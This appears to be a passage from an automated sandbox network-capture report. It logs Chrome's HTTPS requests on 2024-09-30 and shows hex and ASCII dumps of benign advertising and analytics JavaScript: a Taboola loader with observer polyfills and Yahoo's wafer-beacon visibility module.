                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Timer: S1727716863.851110,VS0,VE21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: private,max-age=14400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    abp: 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: abLdr=26;Max-Age=10800; path=/; SameSite=None;Secure
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 2f 2f 41 42 5f 54 45 4d 50 4c 41 54 45 0a 2f 2f 61 62 20 2d 3e 20 32 36 0a 0a 0a 0a 09 09 76 61 72 20 5f 74 61 62 6f 6f 6c 61 20 3d 20 5f 74 61 62 6f 6f 6c 61 20 7c 7c 20 5b 5d 3b 76 61 72 20 54 52 43 20 3d 20 54 52 43 20 7c 7c 20 7b 7d 3b 0a 54 52 43 2e 70 65 72 66 43 6f 6e 66 4f 76 65 72 72 69 64 65 20 3d 20 7b 27 6c 6f 67 54 69 6d 65 72 27 3a 20 35 30 30 30 30 2c 20 27 6c 6f 67 4c 65 6e 67 74 68 27 20 3a 20 35 2c 20 27 74 72 61 66 66 69 63 27 20 3a 20 35 30 2c 20 27 6d 65 61 73 75 72 65 45 6e 61 62 6c 65 27 20 3a 20 74 72 75 65 2c 20 27 6d 65 61 73 75 72 65 54 69 6d 65 54 6f 53 65 6e 64 27 20 3a 20 31 30 30 30 30 2c 20 27 6d 65 61 73 75 72 65 49 6e 74 65 72 76 61 6c 27 20 3a 20 31 30 30 30 30 2c 20 27 64 69 73 61 62 6c 65 52 61 77 44 61 74 61 53 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: //AB_TEMPLATE//ab -> 26var _taboola = _taboola || [];var TRC = TRC || {};TRC.perfConfOverride = {'logTimer': 50000, 'logLength' : 5, 'traffic' : 50, 'measureEnable' : true, 'measureTimeToSend' : 10000, 'measureInterval' : 10000, 'disableRawDataSen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 76 61 74 69 6f 6e 54 61 72 67 65 74 73 2e 73 6f 6d 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 65 6c 65 6d 65 6e 74 3d 3d 65 7d 29 29 29 7b 69 66 28 21 65 7c 7c 31 21 3d 65 2e 6e 6f 64 65 54 79 70 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 74 61 72 67 65 74 20 6d 75 73 74 20 62 65 20 61 6e 20 45 6c 65 6d 65 6e 74 22 29 3b 74 68 69 73 2e 5f 72 65 67 69 73 74 65 72 49 6e 73 74 61 6e 63 65 28 29 2c 74 68 69 73 2e 5f 6f 62 73 65 72 76 61 74 69 6f 6e 54 61 72 67 65 74 73 2e 70 75 73 68 28 7b 65 6c 65 6d 65 6e 74 3a 65 2c 65 6e 74 72 79 3a 6e 75 6c 6c 7d 29 2c 74 68 69 73 2e 5f 6d 6f 6e 69 74 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 2c 74 68 69 73 2e 5f 63 68 65 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: vationTargets.some((function(t){return t.element==e}))){if(!e||1!=e.nodeType)throw new Error("target must be an Element");this._registerInstance(),this._observationTargets.push({element:e,entry:null}),this._monitorIntersections(e.ownerDocument),this._chec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 69 73 2e 5f 6d 6f 6e 69 74 6f 72 69 6e 67 44 6f 63 75 6d 65 6e 74 73 2e 69 6e 64 65 78 4f 66 28 74 29 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 63 68 65 63 6b 46 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 2c 6f 3d 6e 75 6c 6c 2c 61 3d 6e 75 6c 6c 3b 74 68 69 73 2e 50 4f 4c 4c 5f 49 4e 54 45 52 56 41 4c 3f 6f 3d 6e 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 69 2c 74 68 69 73 2e 50 4f 4c 4c 5f 49 4e 54 45 52 56 41 4c 29 3a 28 6c 28 6e 2c 22 72 65 73 69 7a 65 22 2c 69 2c 21 30 29 2c 6c 28 74 2c 22 73 63 72 6f 6c 6c 22 2c 69 2c 21 30 29 2c 74 68 69 73 2e 55 53 45 5f 4d 55 54 41 54 49 4f 4e 5f 4f 42 53 45 52 56 45 52 26 26 22 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 22 69 6e 20 6e 26 26 28 61 3d 6e 65 77 20 6e 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: is._monitoringDocuments.indexOf(t)){var i=this._checkForIntersections,o=null,a=null;this.POLL_INTERVAL?o=n.setInterval(i,this.POLL_INTERVAL):(l(n,"resize",i,!0),l(t,"scroll",i,!0),this.USE_MUTATION_OBSERVER&&"MutationObserver"in n&&(a=new n.MutationObserv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 74 6f 74 79 70 65 2e 5f 63 68 65 63 6b 46 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 72 6f 6f 74 7c 7c 21 6e 7c 7c 69 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 72 6f 6f 74 49 73 49 6e 44 6f 6d 28 29 2c 74 3d 65 3f 74 68 69 73 2e 5f 67 65 74 52 6f 6f 74 52 65 63 74 28 29 3a 7b 74 6f 70 3a 30 2c 62 6f 74 74 6f 6d 3a 30 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 30 2c 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 7d 3b 74 68 69 73 2e 5f 6f 62 73 65 72 76 61 74 69 6f 6e 54 61 72 67 65 74 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 72 3d 69 2e 65 6c 65 6d 65 6e 74 2c 61 3d 63 28 72 29 2c 6c 3d 74 68 69 73 2e 5f 72 6f 6f 74 43 6f 6e 74 61 69 6e 73 54 61 72 67 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype._checkForIntersections=function(){if(this.root||!n||i){var e=this._rootIsInDom(),t=e?this._getRootRect():{top:0,bottom:0,left:0,right:0,width:0,height:0};this._observationTargets.forEach((function(i){var r=i.element,a=c(r),l=this._rootContainsTarge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 29 29 7d 69 66 28 5f 26 26 28 61 3d 5f 2c 6c 3d 62 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 73 3d 4d 61 74 68 2e 6d 61 78 28 61 2e 74 6f 70 2c 6c 2e 74 6f 70 29 2c 64 3d 4d 61 74 68 2e 6d 69 6e 28 61 2e 62 6f 74 74 6f 6d 2c 6c 2e 62 6f 74 74 6f 6d 29 2c 70 3d 4d 61 74 68 2e 6d 61 78 28 61 2e 6c 65 66 74 2c 6c 2e 6c 65 66 74 29 2c 68 3d 64 2d 73 2c 62 3d 28 76 3d 28 6d 3d 4d 61 74 68 2e 6d 69 6e 28 61 2e 72 69 67 68 74 2c 6c 2e 72 69 67 68 74 29 29 2d 70 29 3e 3d 30 26 26 68 3e 3d 30 26 26 7b 74 6f 70 3a 73 2c 62 6f 74 74 6f 6d 3a 64 2c 6c 65 66 74 3a 70 2c 72 69 67 68 74 3a 6d 2c 77 69 64 74 68 3a 76 2c 68 65 69 67 68 74 3a 68 7d 7c 7c 6e 75 6c 6c 29 2c 21 62 29 62 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ))}if(_&&(a=_,l=b,void 0,void 0,void 0,void 0,void 0,void 0,s=Math.max(a.top,l.top),d=Math.min(a.bottom,l.bottom),p=Math.max(a.left,l.left),h=d-s,b=(v=(m=Math.min(a.right,l.right))-p)>=0&&h>=0&&{top:s,bottom:d,left:p,right:m,width:v,height:h}||null),!b)br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 74 7c 7c 6e 3d 3d 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 72 65 67 69 73 74 65 72 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 69 6e 64 65 78 4f 66 28 74 68 69 73 29 3c 30 26 26 74 2e 70 75 73 68 28 74 68 69 73 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 75 6e 72 65 67 69 73 74 65 72 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 2e 69 6e 64 65 78 4f 66 28 74 68 69 73 29 3b 2d 31 21 3d 65 26 26 74 2e 73 70 6c 69 63 65 28 65 2c 31 29 7d 2c 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 3d 61 2c 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 45 6e 74 72 79 3d 6f 7d 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t||n==t.ownerDocument)},a.prototype._registerInstance=function(){t.indexOf(this)<0&&t.push(this)},a.prototype._unregisterInstance=function(){var e=t.indexOf(this);-1!=e&&t.splice(e,1)},window.IntersectionObserver=a,window.IntersectionObserverEntry=o}funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 6e 56 61 6c 75 65 73 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 76 61 6c 75 65 2b 65 2e 75 6e 69 74 7d 29 29 2e 6a 6f 69 6e 28 22 20 22 29 2c 74 68 69 73 2e 5f 6d 6f 6e 69 74 6f 72 69 6e 67 44 6f 63 75 6d 65 6e 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 6d 6f 6e 69 74 6f 72 69 6e 67 55 6e 73 75 62 73 63 72 69 62 65 73 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 2c 6e 2c 69 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6e 2c 69 7c 7c 21 31 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 65 2e 61 74 74 61 63 68 45 76 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nValues.map((function(e){return e.value+e.unit})).join(" "),this._monitoringDocuments=[],this._monitoringUnsubscribes=[]}function l(e,t,n,i){"function"==typeof e.addEventListener?e.addEventListener(t,n,i||!1):"function"==typeof e.attachEvent&&e.attachEven
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 74 68 69 73 2e 5f 73 74 61 74 65 3d 6f 2c 74 68 69 73 2e 5f 76 61 6c 75 65 3d 5b 5d 2c 74 68 69 73 2e 5f 69 73 43 68 61 69 6e 45 6e 64 3d 21 30 2c 76 28 74 68 69 73 2c 73 28 74 68 69 73 2c 69 29 2c 73 28 74 68 69 73 2c 72 29 2c 7b 74 68 65 6e 3a 65 7d 29 7d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 68 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 75 28 65 29 3f 65 3a 76 6f 69 64 20 30 2c 74 3d 75 28 74 29 3f 74 3a 76 6f 69 64 20 30 2c 28 65 7c 7c 74 29 26 26 28 74 68 69 73 2e 5f 69 73 43 68 61 69 6e 45 6e 64 3d 21 31 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 28 74 68 69 73 2e 5f 76 61 6c 75 65 2c 65 2c 74 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 61 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this._state=o,this._value=[],this._isChainEnd=!0,v(this,s(this,i),s(this,r),{then:e})}t.prototype.then=function(e,t){return e=u(e)?e:void 0,t=u(t)?t:void 0,(e||t)&&(this._isChainEnd=!1),this._state(this._value,e,t)},t.prototype.catch=function(e){return th
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 2c 72 65 6a 65 63 74 3a 76 6f 69 64 20 30 7d 29 3b 66 6f 72 28 76 61 72 20 73 3d 30 3b 73 3c 6c 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 76 61 72 20 63 3d 6c 5b 73 5d 3b 65 2e 5f 73 74 61 74 65 28 69 2c 63 2e 6f 6e 46 75 6c 66 69 6c 6c 65 64 2c 63 2e 6f 6e 52 65 6a 65 63 74 65 64 2c 63 2e 64 65 66 65 72 72 65 64 29 7d 6c 2e 6c 65 6e 67 74 68 3d 30 2c 61 26 26 28 61 2e 5f 69 73 43 68 61 69 6e 45 6e 64 3d 21 31 29 2c 74 3d 3d 3d 72 26 26 65 2e 5f 69 73 43 68 61 69 6e 45 6e 64 26 26 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 69 73 43 68 61 69 6e 45 6e 64 26 26 6e 28 69 2c 65 29 7d 29 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 28 65 2c 74 2c 6e 29 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,reject:void 0});for(var s=0;s<l.length;s++){var c=l[s];e._state(i,c.onFulfilled,c.onRejected,c.deferred)}l.length=0,a&&(a._isChainEnd=!1),t===r&&e._isChainEnd&&setTimeout((function(){e._isChainEnd&&n(i,e)}),0)}function s(e,t){return function(n){l(e,t,n)}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1378INData Raw: 61 6d 65 3d 3d 3d 74 2e 6d 6f 64 65 4e 61 6d 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 2c 6e 3d 69 2e 4c 35 2e 6f 70 74 69 6f 6e 73 53 75 6d 6d 61 72 79 2e 70 6c 61 63 65 6d 65 6e 74 73 3b 69 66 28 32 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 70 61 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 65 6e 74 69 74 79 54 79 70 65 29 29 7b 76 61 72 20 6f 3d 65 2e 70 61 72 65 6e 74 2e 66 70 6c 3b 72 65 74 75 72 6e 20 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65 3d 3d 3d 6f 7d 29 29 5b 30 5d 7d 76 61 72 20 61 3d 65 2e 6d 6f 64 65 3b 72 65 74 75 72 6e 20 61 3f 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ame===t.modeName}function o(e){var t,n=i.L5.optionsSummary.placements;if(2===(null===(t=e.parent)||void 0===t?void 0:t.entityType)){var o=e.parent.fpl;return n.filter((function(e){return e.placementName===o}))[0]}var a=e.mode;return a?n.filter((function(e


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    123192.168.2.44988687.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC366OUTGET /aaq/wf/wf-beacon-1.3.4-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: nL9W4hQLGGdfbHtZMdsPrmFSvpDlJ2UQukMMwZ0hmSkddXWRAIXQJit4v7W6YgDYfeM1ddluP9U=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: BEH35C48PYDVFMRF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Sun, 08 Sep 2024 07:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 13 Feb 2023 05:31:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "397b59e3eeca4f747ea1f6ff6323154c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: tENZ6Ri2vrrjg96D4AX.qx653XeJQH2M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 10637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 1937274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-beacon",[],t):"object"==typeof exports?exports["wafer-beacon"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),u=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 74 72 69 62 75 74 65 28 4f 2b 22 74 72 69 67 67 65 72 2d 70 65 72 63 65 6e 74 61 67 65 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 6d 3d 66 28 77 2c 32 29 2c 6b 3d 6d 5b 30 5d 2c 54 3d 6d 5b 31 5d 2c 6a 3d 6b 3f 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 70 61 72 73 65 49 6e 74 28 6b 2c 31 30 29 29 2c 30 29 3a 35 30 2c 43 3d 54 3f 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 70 61 72 73 65 49 6e 74 28 54 2c 31 30 29 29 2c 30 29 3a 35 30 2c 50 3d 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 4f 2b 22 74 72 69 67 67 65 72 2d 63 75 6d 75 6c 61 74 69 76 65 22 29 2c 41 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4f 2b 22 62 65 61 63 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6c 61 73 73 22 29 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ttribute(O+"trigger-percentage")||"").split(" "),m=f(w,2),k=m[0],T=m[1],j=k?Math.max(Math.min(100,parseInt(k,10)),0):50,C=T?Math.max(Math.min(100,parseInt(T,10)),0):50,P=e.hasAttribute(O+"trigger-cumulative"),A=e.getAttribute(O+"beacon-container-class")||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 6f 66 66 73 65 74 59 2c 70 3d 69 2e 73 65 6c 65 63 74 6f 72 2c 79 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 63 2d 75 29 3b 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 2d 69 6e 2d 70 72 6f 67 72 65 73 73 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 28 66 7c 7c 21 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 26 26 28 30 3d 3d 3d 79 7c 7c 21 31 3d 3d 3d 6e 7c 7c 64 2e 69 73 50 61 67 65 56 69 73 69 62 6c 65 26 26 77 28 6f 2c 6c 28 7b 7d 2c 69 2c 7b 6f 66 66 73 65 74 58 3a 68 2c 6f 66 66 73 65 74 59 3a 76 7d 29 2c 64 2e 76 69 65 77 70 6f 72 74 29 29 29 72 65 74 75 72 6e 20 61 26 26 61 2e 73 70 6c 69 74 28 22 7c 22 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: offsetY,p=i.selector,y=Math.max(0,c-u);o.classList.add("wafer-beacon-in-progress"),setTimeout(function(){if((f||!o.classList.contains(s))&&(0===y||!1===n||d.isPageVisible&&w(o,l({},i,{offsetX:h,offsetY:v}),d.viewport)))return a&&a.split("|").forEach(funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 6e 63 74 69 6f 6e 28 72 29 7b 72 26 26 22 6d 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 74 26 26 65 2e 64 65 73 74 72 6f 79 28 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 73 65 74 59 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 30 3b 74 68 69 73 2e 5f 75 74 69 6c 2e 6f 66 66 73 65 74 59 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6f 66 66 73 65 74 59 7c 7c 65 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 73 65 74 58 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e
